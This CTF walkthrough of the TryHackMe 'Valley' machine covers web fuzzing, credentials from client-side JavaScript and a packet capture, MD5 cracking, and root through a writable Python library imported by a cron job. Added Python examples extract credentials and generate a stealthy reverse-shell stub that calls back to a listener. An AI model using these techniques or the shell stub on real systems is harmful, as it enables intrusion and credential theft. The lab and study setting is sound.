TryHackMe : Valley

#$ubh@nk@r
6 min read · Jun 18, 2023


This is an easy Linux machine that needs only some basic enumeration, so as usual I started with a quick Nmap scan.

Tip : nmap -sVC -T4 <ip> -vv

This found two open ports, 80 (http) and 22 (ssh). Keep in mind that without -p- Nmap only probes its default top 1000 ports, which matters later. So I checked the web server first.

WEB Enumeration:

This is a simple page with a ‘View Gallery’ and a ‘View Pricing’ link. I tried opening both.

In the pricing directory I found a ‘note.txt’, which is not very interesting. The other link is just a simple web page.

So I started a ‘Gobuster’ scan and found some directories, but they were not interesting either.

So I went back to the website and looked at the ‘view gallery’ page again.

Here I found a lot of images and thought of steganography, but found nothing. But when I clicked on an image it opened like this:

The URL is ‘http://<ip>/static/2’, and the ‘2’ is set dynamically: change it to ‘3’ and the next image comes up. A sequential identifier like this is always worth enumerating, so I fuzzed it with ‘ffuf’ and a number list.

Tip : ffuf -u ‘http://<ip>/static/FUZZ’ -w ‘<number_list>’ -t 50

And I got some results. Note that the number list has to contain zero-padded entries such as ‘00’, otherwise the interesting hit below is missed.

Here the ‘00’ entry looks interesting, so I looked at it. And as usual it was the right call. :)

In it I found a hidden directory called ‘/dev1243224123123’. I checked that directory and found a login page. Ohhhhh!!!

I tried common credentials without success, and also tried SQL injection, but nothing. So I viewed the page source and found an interesting JavaScript file called ‘dev.js’.

Source code sometimes reveals something, so I opened that file.

Under the if statement there are two variables whose values are set to siemDev : california (username : password). In other words the login check is done entirely in the browser and the credentials ship with the page, so anyone who reads the script gets them. I tried logging in with them and got this:
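To show what I mean by credentials being checked in JavaScript, here is an added example (my editing addition, not code from the write-up or the room): a small scanner that pulls identifier-to-string comparisons and assignments with login-looking names out of a JS file, and pairs a username comparison with a password comparison on the same line. The sample dev.js it runs on is constructed for the example; the real file is only described above, and the redirect path in it is made up.

```python
import re

# Constructed sample in the style of a client-side login script, written for
# this example; it is NOT the room's real dev.js. The redirect path is made up.
SAMPLE_DEV_JS = r"""
function loginSubmit() {
  var username = document.getElementById("username").value;
  var password = document.getElementById("password").value;
  const debugToken = "dev-only-1234";
  if (username === "siemDev" && password === "california") {
    window.location.replace("/notes.html");
  } else if (username !== 'guest') {
    alert("Wrong credentials");
  }
}
"""

# Identifier names that suggest a login field or a secret.
SENSITIVE_NAME = re.compile(r"user|login|pass|pwd|secret|token|key|auth", re.IGNORECASE)

# A quoted string literal (group 2 = quote, group 3 = value), allowing backslash escapes.
_LITERAL = r"""(["'])((?:\\.|(?!\2).)*)\2"""
# identifier compared to a literal:   password === "california", user !== 'guest'
COMPARISON = re.compile(r"\b([A-Za-z_]\w*)\s*(?:===?|!==?)\s*" + _LITERAL)
# identifier assigned a literal:      const debugToken = "dev-only-1234"
ASSIGNMENT = re.compile(r"\b([A-Za-z_]\w*)\s*=\s*" + _LITERAL)


def find_hardcoded_credentials(js_source):
    """Every comparison or assignment of a sensitive-looking identifier to a string literal."""
    findings = []
    for lineno, line in enumerate(js_source.splitlines(), 1):
        for kind, pattern in (("comparison", COMPARISON), ("assignment", ASSIGNMENT)):
            for match in pattern.finditer(line):
                name, value = match.group(1), match.group(3)
                if value and SENSITIVE_NAME.search(name):
                    findings.append({"line": lineno, "kind": kind, "name": name, "value": value})
    return findings


def login_pairs(findings):
    """Pair a user-like and a password-like comparison that sit on the same line."""
    by_line = {}
    for f in findings:
        if f["kind"] == "comparison":
            by_line.setdefault(f["line"], []).append(f)
    pairs = []
    for items in by_line.values():
        users = [f["value"] for f in items if re.search(r"user|login", f["name"], re.I)]
        passwords = [f["value"] for f in items if re.search(r"pass|pwd", f["name"], re.I)]
        pairs.extend((u, p) for u in users for p in passwords)
    return pairs


if __name__ == "__main__":
    found = find_hardcoded_credentials(SAMPLE_DEV_JS)
    for f in found:
        print(f"line {f['line']}: {f['kind']} {f['name']} -> {f['value']!r}")
    print("login pairs:", login_pairs(found))
```

This is a static check, so it only finds what is literally in the file; the real fix for the page is to move the check server-side, because nothing a browser evaluates can be a secret.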

There is a note for me from the dev about an FTP service, but I had not found any open FTP port. The note says ‘change ftp port to normal port’, which means FTP is not running on port 21, and my first scan only covered the top 1000 ports. So I ran a full port scan and found it. :)

Tip : nmap -sVC -p- -T4 <ip> -vv

It is running on 37370, but anonymous login is not allowed. So I tried the credentials found on the web page.

FTP Enumeration:

FTP = siemDev : california

And I was logged in.

Analysis with Wireshark:

Here I found three packet capture files. I downloaded them all to my machine and fired up Wireshark.

I checked siemFTP and siemHTTP1 and found nothing interesting. Then I checked ‘siemHTTP2’.

Here I filtered for ‘http’ requests and saw a GET and a POST request to /index.html. I checked the GET first and then the POST, and found this in the POST. Right-click on that packet, then Follow, then TCP Stream. You will see this:

valleyDev > valley:

Here I found a username and password (valleyDev : ph0t0s1234) submitted in the form body over plain HTTP. Since people reuse passwords, I guessed they might also be SSH credentials, and they were: I logged in as valleyDev and found ‘user.txt’.
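For readers who want to do the ‘Follow TCP Stream’ step without Wireshark, here is an added example (not from the original post or from the room’s files) that parses a pcap, reassembles the client side of each TCP connection to port 80, splits it into HTTP requests and pulls the fields out of form-urlencoded POST bodies. The capture it parses is built inline and stands in for siemHTTP2; the addresses, ports, Host header and form field names are assumptions, only the credential pair comes from the write-up.

```python
import struct
from urllib.parse import parse_qs

PCAP_MAGIC = 0xA1B2C3D4  # little-endian pcap with microsecond timestamps
LINKTYPE_ETHERNET = 1


def build_pcap(segments):
    """Build a minimal pcap from (src_port, dst_port, payload) TCP segments.
    Only used to construct the sample below; checksums stay zero and the
    parser does not verify them."""
    out = struct.pack("<IHHiIII", PCAP_MAGIC, 2, 4, 0, 0, 65535, LINKTYPE_ETHERNET)
    for i, (sport, dport, payload) in enumerate(segments):
        tcp = struct.pack("!HHIIBBHHH", sport, dport, 1, 1, 5 << 4, 0x18, 65535, 0, 0)
        ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp) + len(payload), 0, 0x4000,
                         64, 6, 0, bytes([10, 0, 0, 5]), bytes([10, 0, 0, 1]))
        frame = b"\xaa" * 6 + b"\xbb" * 6 + b"\x08\x00" + ip + tcp + payload
        out += struct.pack("<IIII", 1_600_000_000 + i, 0, len(frame), len(frame)) + frame
    return out


def tcp_streams(pcap_bytes, port=80):
    """Concatenate the TCP payload of every segment sent to `port`, per connection.
    Assumes an in-order capture with no retransmissions (Wireshark honours
    sequence numbers; this example keeps it simple)."""
    magic, = struct.unpack_from("<I", pcap_bytes, 0)
    if magic != PCAP_MAGIC:
        raise ValueError("not a little-endian pcap")
    streams, offset = {}, 24
    while offset + 16 <= len(pcap_bytes):
        _, _, incl_len, _ = struct.unpack_from("<IIII", pcap_bytes, offset)
        offset += 16
        frame = pcap_bytes[offset:offset + incl_len]
        offset += incl_len
        if len(frame) < 54 or frame[12:14] != b"\x08\x00":   # not IPv4
            continue
        ihl = (frame[14] & 0x0F) * 4
        ip_total, = struct.unpack_from("!H", frame, 16)
        if frame[23] != 6:                                     # not TCP
            continue
        tcp_off = 14 + ihl
        sport, dport = struct.unpack_from("!HH", frame, tcp_off)
        data_off = (frame[tcp_off + 12] >> 4) * 4
        payload = frame[tcp_off + data_off:14 + ip_total]
        if dport == port and payload:
            key = (frame[26:30], sport, frame[30:34], dport)   # src, sport, dst, dport
            streams.setdefault(key, bytearray()).extend(payload)
    return streams


def http_requests(stream):
    """Split one reassembled client->server stream into HTTP requests."""
    buf, requests = bytes(stream), []
    while True:
        end = buf.find(b"\r\n\r\n")
        if end < 0:
            break
        head, buf = buf[:end].decode("latin-1"), buf[end + 4:]
        request_line, *header_lines = head.split("\r\n")
        method, path, _version = request_line.split(" ", 2)
        headers = {}
        for line in header_lines:
            name, _, value = line.partition(":")
            headers[name.strip().lower()] = value.strip()
        length = int(headers.get("content-length", "0"))
        body, buf = buf[:length], buf[length:]
        requests.append({"method": method, "path": path, "headers": headers, "body": body})
    return requests


def extract_form_credentials(pcap_bytes, port=80):
    """Fields of every form-urlencoded POST body: what 'Follow TCP Stream' shows."""
    found = []
    for stream in tcp_streams(pcap_bytes, port).values():
        for req in http_requests(stream):
            if req["method"] != "POST":
                continue
            if "application/x-www-form-urlencoded" not in req["headers"].get("content-type", ""):
                continue
            fields = {k: v[0] for k, v in parse_qs(req["body"].decode("latin-1")).items()}
            found.append({"path": req["path"], "fields": fields})
    return found


# Constructed capture standing in for siemHTTP2: a GET, then a POST whose headers
# and body arrive in separate segments. Hosts, ports and field names are made up.
_BODY = b"username=valleyDev&password=ph0t0s1234"
SAMPLE_PCAP = build_pcap([
    (40001, 80, b"GET /index.html HTTP/1.1\r\nHost: valley\r\n\r\n"),
    (40002, 80, b"POST /index.html HTTP/1.1\r\nHost: valley\r\n"
                b"Content-Type: application/x-www-form-urlencoded\r\n"
                b"Content-Length: " + str(len(_BODY)).encode() + b"\r\n\r\n"),
    (40002, 80, _BODY),
])

if __name__ == "__main__":
    for cred in extract_form_credentials(SAMPLE_PCAP):
        print(cred["path"], cred["fields"])
```

The split POST is the point: the credentials only appear once the two segments are joined, which is exactly what Follow TCP Stream does for you, and why a packet-by-packet ‘http’ filter view can hide the body.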

I started regular enumeration. In the home directory I found a binary file, which I downloaded to my machine. When executed it asks for a username and password, which I did not know.

So I ran the ‘strings’ command on the binary and saved the output to a file.

I opened it with Mousepad and searched for ‘user’, because there are a lot of random strings.

The long string next to it is an MD5 hash. I went to Crackstation, cracked it, and got a password. Yahh!!

It is liberty123.

But what is the username? As I am the ‘valleyDev’ user, I checked for other users on the machine and found that valley is a valid user. I ran ‘su valley’ with that password, and we are logged in as valley.
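The strings-then-Crackstation step is really an offline dictionary attack on an unsalted MD5, which you can do locally with a wordlist. The following is an added example, not the binary or any code from the room: it extracts printable strings from a constructed stand-in blob, keeps the ones that mention ‘user’, picks out 32-hex-character tokens and tries each against a small constructed wordlist. The blob’s layout, its prompt strings and the wordlist are made up; only the password liberty123 comes from the write-up.

```python
import hashlib
import re

# Constructed stand-in for the binary from the home directory: ELF-looking
# bytes, some prompt strings, and an unsalted MD5 of the password embedded
# next to a 'user' marker. Layout and text are made up for this example.
SAMPLE_BINARY = (
    b"\x7fELF\x02\x01\x01\x00" + bytes(range(256)) +
    b"Enter username: \x00Enter password: \x00"
    b"user password md5: " + hashlib.md5(b"liberty123").hexdigest().encode() + b"\x00"
    b"Access granted\x00" + bytes(range(255, 0, -1))
)

# Constructed wordlist; Crackstation does the same lookup against a huge precomputed table.
WORDLIST = ["password", "valley", "Valley2023", "letmein", "liberty123", "admin"]

MD5_RE = re.compile(r"\b[0-9a-fA-F]{32}\b")


def extract_strings(blob, min_len=4):
    """Equivalent of `strings`: runs of printable ASCII at least min_len long."""
    return [m.group().decode("ascii") for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, blob)]


def md5_candidates(strings, near=None):
    """32-hex-char tokens, optionally only from strings that also mention `near`."""
    hits = []
    for s in strings:
        if near and near.lower() not in s.lower():
            continue
        hits.extend(h.lower() for h in MD5_RE.findall(s))
    return hits


def crack_md5(digest, wordlist):
    """Offline dictionary attack: unsalted MD5 is fast, so each guess costs one hash."""
    for word in wordlist:
        if hashlib.md5(word.encode()).hexdigest() == digest:
            return word
    return None


def recover_password(blob, wordlist, near="user"):
    """The write-up's pipeline: strings -> lines mentioning 'user' -> MD5 -> dictionary."""
    for digest in md5_candidates(extract_strings(blob), near):
        word = crack_md5(digest, wordlist)
        if word is not None:
            return digest, word
    return None


if __name__ == "__main__":
    print(recover_password(SAMPLE_BINARY, WORDLIST))
```

Hard-coding a fast unsalted hash in a binary is what makes this cheap; a salted, slow hash such as bcrypt would turn the same wordlist run from milliseconds into something you would not bother with in a CTF.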

Privilege Escalation:

Here, using the ‘id’ command, I found there is a group called ‘valleyadmin’. I started looking for files owned by that group.

I also found a Python script running as root from a cronjob. That is interesting.

I opened that script, and it imports a module called base64, which lives at ‘/usr/lib/python3.8/base64.py’.

That file turned out to be writable by my user, so I opened ‘/usr/lib/python3.8/base64.py’ and placed a Python reverse shell in it. When the cronjob runs photoEncrypt.py it imports base64.py, the reverse shell executes, and we get a shell as root. (This is the whole lesson: a script run as root must only import files that root owns and nobody else can write.)

I saved the file and started a Netcat listener on my machine on port 4444.

After some time I got a shell as root, and that is how I pwned the machine. ‘root.txt’ is in the root directory.
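Before editing base64.py it is worth checking, for every module the cron script imports, where the interpreter will resolve it and whether that file, or any directory searched before it, is writable by you. Here is an added example (not the room’s photoEncrypt.py and not code from the post) that does this check with the AST and importlib, and builds the text of the reverse-shell stub to prepend to the hijacked module. The sample script, the photo_helper module, the temporary directory and the listener address 10.0.0.5:4444 are assumptions made for the example.

```python
import ast
import importlib
import importlib.util
import os
import sys
import tempfile

# Constructed stand-in for the cron-run script. The real photoEncrypt.py is not
# shown in the write-up; all we know is that it imports base64.
SAMPLE_CRON_SCRIPT = """
import base64
import photo_helper          # hypothetical helper module next to the script
from os import path

def main():
    name = path.basename("/tmp/photo.jpg")
    return base64.b64encode(photo_helper.encrypt(name.encode()))
"""


def imported_modules(source):
    """Top-level names a script imports, read from the AST without running it."""
    names = set()
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Import):
            names.update(alias.name.split(".")[0] for alias in node.names)
        elif isinstance(node, ast.ImportFrom) and node.module and node.level == 0:
            names.add(node.module.split(".")[0])
    return sorted(names)


def writable_imports(source, search_path=()):
    """Resolve each import as the interpreter would (search_path first, then
    sys.path) and report whether the resolved file is writable by us. A writable
    entry runs our code with the privileges of whoever runs the script."""
    saved = sys.path[:]
    sys.path[:0] = list(search_path)
    importlib.invalidate_caches()
    report = {}
    try:
        for name in imported_modules(source):
            spec = importlib.util.find_spec(name)
            origin = spec.origin if spec else None
            writable = origin not in (None, "built-in", "frozen") and os.access(origin, os.W_OK)
            report[name] = {"path": origin, "writable": writable}
    finally:
        sys.path[:] = saved
    return report


def writable_search_dirs(script_dir):
    """Directories searched before the stdlib when the script runs: its own
    directory, then sys.path. A writable one lets you shadow a non-frozen stdlib
    module (drop a base64.py there) even if the real file is read-only."""
    candidates = [script_dir] + [p for p in sys.path if p]
    return [d for d in candidates if os.path.isdir(d) and os.access(d, os.W_OK)]


def reverse_shell_stub(lhost, lport):
    """Text to prepend (not substitute) into the hijacked module, so the module
    keeps working and the cron job neither breaks nor logs an error when the
    listener is down. Returned as a string; this example never executes it."""
    return (
        "try:\n"
        "    import os as _o, socket as _s, subprocess as _sp\n"
        f"    _c = _s.socket(); _c.connect(({lhost!r}, {int(lport)}))\n"
        "    if _o.fork() == 0:\n"
        "        for _fd in (0, 1, 2): _o.dup2(_c.fileno(), _fd)\n"
        "        _sp.call(['/bin/sh', '-i']); _o._exit(0)\n"
        "    _c.close()\n"
        "except Exception:\n"
        "    pass\n"
    )


def demo():
    """Run the check with a throwaway writable helper module so it is self-contained."""
    work = tempfile.mkdtemp()
    with open(os.path.join(work, "photo_helper.py"), "w") as fh:
        fh.write("def encrypt(b):\n    return b[::-1]\n")
    return {
        "report": writable_imports(SAMPLE_CRON_SCRIPT, search_path=[work]),
        "writable_dirs": writable_search_dirs(work),
        "work_dir": work,
        "stub": reverse_shell_stub("10.0.0.5", 4444),
    }


if __name__ == "__main__":
    result = demo()
    for mod, info in result["report"].items():
        print(f"{mod:<14} {info['path']}  writable={info['writable']}")
    print("writable search dirs:", result["writable_dirs"])
```

Run it as the low-privileged user on the target with the real script’s source; on this box the base64 entry is what comes back writable. The same report, read the other way round, is the hardening check a defender wants: every import of a root cron job should resolve to a root-owned, non-group-writable file, and the script’s own directory should not be writable either.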

Thank You!

Happy Hacking~~



Written by #$ubh@nk@r

CyberSecurity Learner, CTF Player, Noob Bug Hunter https://starlox0.github.io/
